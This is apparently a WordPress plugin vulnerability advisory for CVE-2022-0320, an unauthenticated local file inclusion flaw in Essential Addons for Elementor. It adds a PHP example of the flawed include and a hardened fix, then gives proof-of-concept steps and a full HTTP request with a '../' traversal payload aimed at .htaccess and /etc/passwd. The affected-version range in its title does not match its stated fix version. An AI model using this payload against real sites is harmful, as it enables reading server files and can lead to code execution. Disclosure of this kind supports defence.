
WordPress Plugin Vulnerabilities

Essential Addons for Elementor < 5.0.5 - Unauthenticated LFI

Description

The plugin does not validate and sanitise some template data before using it in include statements, which could allow unauthenticated attackers to perform Local File Inclusion attacks and read arbitrary files on the server. This could also lead to RCE via user-uploaded files or other LFI-to-RCE techniques.
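As an added illustration (not the plugin's own code and not taken from the advisory), the PHP below contrasts the unsafe pattern the description refers to, a request-controlled file name concatenated straight into an include, with a hardened resolver. TEMPLATE_ROOT, resolve_template_path() and the template_info array layout are assumptions for this example; the two checks (character allowlist, then realpath() containment under a fixed root) are the generic mitigation for CWE-22 in include paths.

```php
<?php
// Added example, not the plugin's code. Assumed layout: template files live
// under TEMPLATE_ROOT/<dir>/<file_name>.php and the AJAX handler receives
// $_POST['template_info']['dir'] and ['file_name'] from an unauthenticated caller.
const TEMPLATE_ROOT = __DIR__ . '/includes/Template';

// Unsafe pattern the advisory describes (illustrative only): the caller picks
// the path, so "../../../../etc/passwd" or an uploaded .php file gets included.
//   include $base_dir . $_POST['template_info']['file_name'];

// Hardened resolver: returns a canonical path inside TEMPLATE_ROOT or null.
function resolve_template_path(array $template_info): ?string {
    $dir  = (string) ($template_info['dir'] ?? '');
    $name = (string) ($template_info['file_name'] ?? '');

    // 1. Shape check before any filesystem call: short, lowercase tokens only.
    //    This rejects "..", "/", "\", null bytes and stream wrappers (php://).
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/', $dir) ||
        !preg_match('/\A[a-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    // 2. The extension is appended by us, never taken from the request, so the
    //    caller cannot point the include at .htaccess, .txt or an uploaded file.
    $candidate = TEMPLATE_ROOT . '/' . $dir . '/' . $name . '.php';

    // 3. Containment check: realpath() resolves symlinks and dot segments and
    //    returns false for missing files; the result must stay under the root.
    $root = realpath(TEMPLATE_ROOT);
    $real = realpath($candidate);
    if ($root === false || $real === false) {
        return null;
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Hardened usage inside the AJAX handler (assumed shape of the handler):
$template_info = $_POST['template_info'] ?? [];
$path = resolve_template_path(is_array($template_info) ? $template_info : []);
if ($path === null) {
    // wp_send_json_error() is the WordPress helper; 400 is the HTTP status.
    wp_send_json_error('invalid template', 400);
}
include $path;
```

Note that the nonce seen in the proof-of-concept request does not mitigate this class of bug: an unauthenticated visitor obtains it from the rendered page, so the only effective control is that the server, not the request, decides which file is included.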

Proof of Concept

- Create a simple page and edit it with Elementor
- Add a Post Grid with the Show Load More option enabled (in the Layout Settings section of the widget; default is disabled)
- As an unauthenticated user, navigate to that page and intercept the request made when clicking the Load More button
- Change the template_info[file_name] parameter to a payload such as ../../../../../../.htaccess, ../../../../../../../../etc/passwd etc. (the template_info[name] parameter is also vulnerable)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 396
Connection: close

action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid&args=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2f.htaccess&template_info%5Bname%5D=Post-Grid

The ajax_eael_product_gallery AJAX action (Product Grid widget) is also affected.

Affects Plugins

essential-addons-for-elementor-lite
Fixed in version 5.0.9

References

CVE
CVE-2022-0320

Classification

Type

LFI

OWASP top 10
A1: Injection
CWE
CWE-22

Miscellaneous

Original Researcher

Wai Yan Myo Thet

Submitter

Wai Yan Myo Thet

Verified

Yes

WPVDB ID
0d02b222-e672-4ac0-a1d4-d34e1ecf4a95

Timeline

Publicly Published

2022-01-31 (about 12 months ago)

Added

2022-01-31 (about 12 months ago)

Last Updated

2022-04-12 (about 9 months ago)
